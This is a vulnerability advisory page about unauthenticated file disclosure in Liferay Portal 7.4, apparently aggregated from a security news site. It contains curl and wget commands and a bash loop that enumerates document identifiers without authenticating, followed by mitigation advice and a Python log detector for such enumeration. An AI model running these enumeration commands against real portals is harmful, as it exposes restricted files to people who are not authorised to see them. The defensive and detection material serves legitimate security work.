Liferay Portal, Unauthenticated File Access, CVE-2025-XXXX (Moderate)

The vulnerability lies in how the document_library web resource handles file requests. A flawed permission check lets unauthenticated users (guests) build a URL that bypasses authorization: by appending a crafted parameter or path segment to a known download endpoint, the request is never checked against the access control list (ACL) of the underlying file. As a result, files uploaded through forms, which are meant to be restricted, can be fetched directly by guessing or discovering their object identifiers and storage paths. The outcome is unauthorized information disclosure to anyone who can reach the portal.
Platform: Liferay Portal/DXP
Version: 7.4.0 – 7.4.3.132
Vulnerability: File Access
Severity: Moderate

date: 2025-08-20

Prediction: 2025-09-17

What Undercode Say:

`curl -s "http://target:8080/documents/12345/0/secret_file.pdf?download=true"`
`wget --content-disposition http://target:8080/doclib/guest_download/9876`

```bash
#!/bin/bash
# Enumerate a range of document identifiers as an unauthenticated client.
# -f makes curl fail on HTTP 4xx/5xx instead of saving the error page; the
# trailing rm removes any empty file left behind for a failed request, so
# only documents the server actually served remain on disk.
for i in {10000..10100}; do
  curl -sf "http://victim:8080/documents/$i/0/" -o "doc_$i.tmp" || rm -f "doc_$i.tmp"
done
```

How to exploit:

Craft a URL to the document_library resource that references the target file's object identifier and storage path, and request it without authenticating.

Protection from this CVE

Apply the vendor's access control patch. Restrict guest (unauthenticated) permissions on the document library. Filter document library requests so that unauthenticated clients cannot reach restricted files, and verify the fix by requesting a restricted document as a guest and confirming it is denied.
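The enumeration loop above leaves a recognisable trace: one client with no authenticated principal requesting many different document identifiers in a short time, mostly getting 403/404 back. The following detection routine is an added example, not code from the original page or from Liferay. It assumes a standard Apache/Tomcat "combined" access log in which the third field is the remote user and "-" means no authenticated principal was recorded (check what your access-log valve actually writes), treats the first numeric path segment after /documents/ as the object identifier, and uses a constructed set of log lines and arbitrary thresholds (5 distinct identifiers inside 60 seconds) chosen only for illustration.

```python
"""Flag unauthenticated clients enumerating Liferay document-library URLs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/Tomcat "combined" access-log layout. Assumption for this example: the
# third field is the remote user and "-" means no authenticated principal.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Document-library download path; the first numeric segment is the identifier
# that the enumeration loop on this page iterates over.
DOC_RE = re.compile(r'^/documents/(?P<obj_id>\d+)/\d+/')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: 10.0.0.5 enumerates ids as a guest, alice downloads
# two files while logged in, 172.16.3.9 fetches a single public brochure.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2025:10:15:01 +0000] "GET /documents/10000/0/ HTTP/1.1" 404 512
10.0.0.5 - - [20/Aug/2025:10:15:01 +0000] "GET /documents/10001/0/ HTTP/1.1" 404 512
10.0.0.5 - - [20/Aug/2025:10:15:02 +0000] "GET /documents/10002/0/ HTTP/1.1" 200 48211
10.0.0.5 - - [20/Aug/2025:10:15:02 +0000] "GET /documents/10003/0/ HTTP/1.1" 404 512
10.0.0.5 - - [20/Aug/2025:10:15:03 +0000] "GET /documents/10004/0/ HTTP/1.1" 404 512
10.0.0.5 - - [20/Aug/2025:10:15:03 +0000] "GET /documents/10005/0/ HTTP/1.1" 403 512
192.168.1.20 - alice [20/Aug/2025:10:16:40 +0000] "GET /documents/20101/0/report.pdf?download=true HTTP/1.1" 200 90221
192.168.1.20 - alice [20/Aug/2025:10:16:55 +0000] "GET /documents/20102/0/report2.pdf?download=true HTTP/1.1" 200 90221
172.16.3.9 - - [20/Aug/2025:10:17:00 +0000] "GET /web/guest/home HTTP/1.1" 200 15120
172.16.3.9 - - [20/Aug/2025:10:17:05 +0000] "GET /documents/30000/0/brochure.pdf HTTP/1.1" 200 77000
"""


def parse_line(line):
    """Return a record for a document-library request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = DOC_RE.match(m["path"])
    if not d:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "obj_id": int(d["obj_id"]),
        "status": int(m["status"]),
    }


def find_enumeration(lines, window_s=60, min_distinct=5):
    """One finding per unauthenticated client that requested at least
    `min_distinct` different document identifiers within any `window_s` window."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["user"] == "-":          # unauthenticated only
            per_client[rec["ip"]].append(rec)

    findings = []
    for ip, recs in per_client.items():
        recs.sort(key=lambda r: r["ts"])
        window = deque()                        # sliding time window of requests
        for rec in recs:
            window.append(rec)
            while (rec["ts"] - window[0]["ts"]).total_seconds() > window_s:
                window.popleft()
            ids = {r["obj_id"] for r in window}
            if len(ids) >= min_distinct:
                findings.append({
                    "ip": ip,
                    "distinct_ids": len(ids),
                    "errors": sum(1 for r in window if r["status"] >= 400),
                    "hits": sum(1 for r in window if r["status"] == 200),
                    "first": window[0]["ts"].isoformat(),
                    "last": rec["ts"].isoformat(),
                })
                break                           # report each client once
    return findings


if __name__ == "__main__":
    for f in find_enumeration(SAMPLE_LOG.splitlines()):
        print(f)
```

The error count matters as much as the distinct-id count: a legitimate guest browsing public documents produces 200s, whereas guessing identifiers produces a run of 403/404 responses with the occasional 200 that marks a successfully disclosed file. Feed the function your real access log (one line per element) and tune the thresholds to the portal's normal traffic before alerting on it.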

Impact:

Unauthenticated file disclosure. Sensitive data exposure.

Sources:

Reported By: github.com
